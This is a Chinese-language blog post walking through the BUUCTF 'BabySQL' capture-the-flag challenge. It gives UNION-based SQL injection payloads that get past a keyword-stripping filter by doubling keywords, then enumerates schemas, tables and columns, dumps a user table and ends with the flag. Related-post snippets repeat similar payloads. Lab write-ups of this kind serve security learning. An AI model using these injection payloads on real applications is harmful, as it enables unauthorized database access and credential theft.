BUUCTF---[极客大挑战 2019]BabySQL1

最新推荐文章于 2024-05-19 17:03:37 发布
最新推荐文章于 2024-05-19 17:03:37 发布
阅读量583 收藏 6
点赞数 8
文章标签: 数据库 sql mysql 网络安全 web安全 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/136429959
版权

1.这道题和之前做的几道题是相似的,这道题考的知识点更多。难度也比之前的大一些

2.尝试万能密码' or =1#发现过滤了or,使用1'和1'',发现他对单引号也进行了过滤。于是我尝试进行双写绕过,发现可以通过了。

3.由之前的做题经验可知,这道题会涉及到数据库

4.我们先来查询它的列数,一共有四列

5.接着查表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了

尝试在单词中间插入一样的字母,可以绕过,但是提示表不存在

经过仔细观察才发现informationz中有or所以也要使用双写绕过

6.得到了表名b4bsql,geekuser,接下来查表中字段

使用下面命令爆第一张表的字段

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

使用下面命令爆第二张表的字段

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='geekuser'#

7.字段有了,接下来爆字段中的信息

先使用下面命令查询第一张表中字段信息

1' ununionion selselectect 1,2,group_concat(id,username,password) frfromom geekuser#

8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询

查完才知道原来它不止一个库

1' ununionion selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

9.使用下面指令查flag

1' ununionion selselectect 1,2,flag frfromom 库名.Flag#

10.经过不断的试库,终于在ctf库中得到了flag

使用的命令为

1' ununionion selselectect 1,2,flag frfromom ctf.Flag#
flag{e2f874de-5c8c-47ea-b8ac-b4f5a42bf231}

不拿flag不改名
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
微信小程序-极客学院.zip
04-14
微信小程序-极客学院.zip,小程序模板代码,基于微信小程序的在线免费小说的开发。,可以直接从源码里粘贴复制过来,虽然这样做不利于自己独立编写代码。
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5016
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 3737
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
Buuctf-[极客挑战 2019]BabySQL
m0_63563528的博客
04-12 625
这题的难点在于不知道过滤内容有哪些,我是通过双写一个一个的试出来的:ununionion ,seselectlect,frfromom,infoorrmation,passwoorrd,whwhereere这些要双写。如此便成功找到flag。
buuctf-web-[极客挑战 2019]BabySQL
weixin_46079186的博客
07-02 148
打开网站 输入用户名密码 admin & 123456 返回密码错误 密码后面输入一个单引号页面报错 判断列 当我输入’order by 1#时 他把我or、by 都过滤了 尝试绕过 'oor rder bby y 1 # 成功绕过 判断4个列 ’order by 4# 判断回显点 输入的时候union select 也被过滤了 构造绕过:'ununionion selselectect 1,2,3# 查看数据库名 'uniunionon selselect..
BUUCTF-[极客挑战 2019]BabySQL1
Monica的博客
10-02 1076
目录 题目: 分析: 题目: 分析: 先测试是什么闭合 near ' ' 123' 'and password=' 'amdin' ' ' at line 1 通过拆分可以看出用户名和密码都是单引号闭合 猜测后台语句为: ' select xxx from xxx where username='' and password='' ' 测试有几列: 发现有过滤。 union 和select也被过滤了,试试...
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
thegeekdeveloper-portfolio:极客开发人员组合
05-13
极客开发人员组合 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm start # generate ...
Certificate-Engine:极客之家的证书引擎
05-15
证书引擎这是技术协会House of Geeks的证书引擎的开发库。... 将其克隆到您的计算机。 在“ cehg / client / web-app”文件夹中打开终端/ cmd 运行“ npm install”以安装所有依赖项。 运行“ npm start”以启动开发...
FTG-modules:FTG-Modules,由快速极客进行修改
03-06
友好的电报模块来自官方存储库的FTG模块回购,电报渠道@memeframe @dekftgmodules @ ftgmodulesbyfl1yd @ClownRepo @govnocodules @FTGModules @atiksftgmodules,通过fast-geek进行修改
mysql事务(原理)
最新发布
m0_74347016的博客
05-19 525
mysql事务原理
生产报表工具PI DataLInk 与 行列视之间的区别
2401_83701843的博客
05-17 250
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
MySQL存储过程添加二十万条数据日常练习
mi_mx的博客
05-17 305
【代码】MySQL日常练习。
linux中查找某个文件或文件夹
DN金猿的博客
05-18 246
locate命令将会在整个系统中搜索文件和文件夹,并通过正则表达式匹配以"/folder_name"结尾的路径。这将会在指定的路径(/path/to/search)中递归地列出所有文件和文件夹,并使用grep命令匹配以"/folder_name"结尾的行。该命令将会在指定的路径(/path/to/search)中查找名称为"folder_name"的文件夹。此方法与第2种方法类似,但使用了find命令来递归搜索文件夹,并使用grep命令来匹配以"/folder_name"结尾的行。
MongoDB聚合运算符:$zip
superatom01的博客
05-15 358
摘要:`$zip`用于将输入数组的元素重新组合转换为新的数组,重组转换的的规则是使用输入数组的第一个元素重组为第一个数组,使用第二个元素重组为第二个数组,以此类推。
【Golang】 MySQL 在 Go 语言驱动程序中常用参数
tr6666的博客
05-15 322
在 Go 语言中,我们使用数据库驱动程序来连接和操作数据库。对于 MySQL,我们通常使用 go-sql-driver/mysql 驱动程序。在使用这个驱动程序时,我们需要提供一个数据源名称(DSN),它是一个包含数据库连接信息的字符串。在这个字符串中,我们可以设置很多参数来控制驱动程序的行为。本文将介绍一些常用的参数。在 MySQL 的 Go 语言驱动程序中,我们可以通过设置 DSN 中的参数来控制驱动程序的行为。这些参数可以影响到连接的建立,数据的读写,以及数据的解析等各个方面。
MySQL-InnoDB数据存储结构
我姓谭却弹不死你的博客
05-13 878
MySQL-InnoDB数据存储结构
CentOS8+MySQL8.0.26+Skywalking9.7.0数据清理机制
xiaozhanfeng的博客
05-15 795
#### 代码中定义的额外模型列,这些模型列在聚合或查询时不需要,会加重负载。但激活后,用户可以看到名称,更容易自行查询数据。##### 1级聚合到2级聚合的刷新时间,默认500毫秒。##### TOPN记录报告周期,默认10分钟。##### 执行数据持久化周期,默认25秒。##### 数据清理定时器,默认5分钟。##### 明细记录有效期,默认3天。##### 监测数据有效期,默认7天。##### 会话时间阈值,默认70秒。##### 数据清理开关,默认开启。
[极客挑战 2019]BabySQL 1
09-03
BabySQL 1 是一道出现在极客挑战 2019 的题目,是一个 SQL 注入的题目。在这道题中,你需要通过注入来绕过对输入参数的限制,从而获取到所需的数据。 请注意,这里只是简单介绍了题目的基本情况,具体的题目内容...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值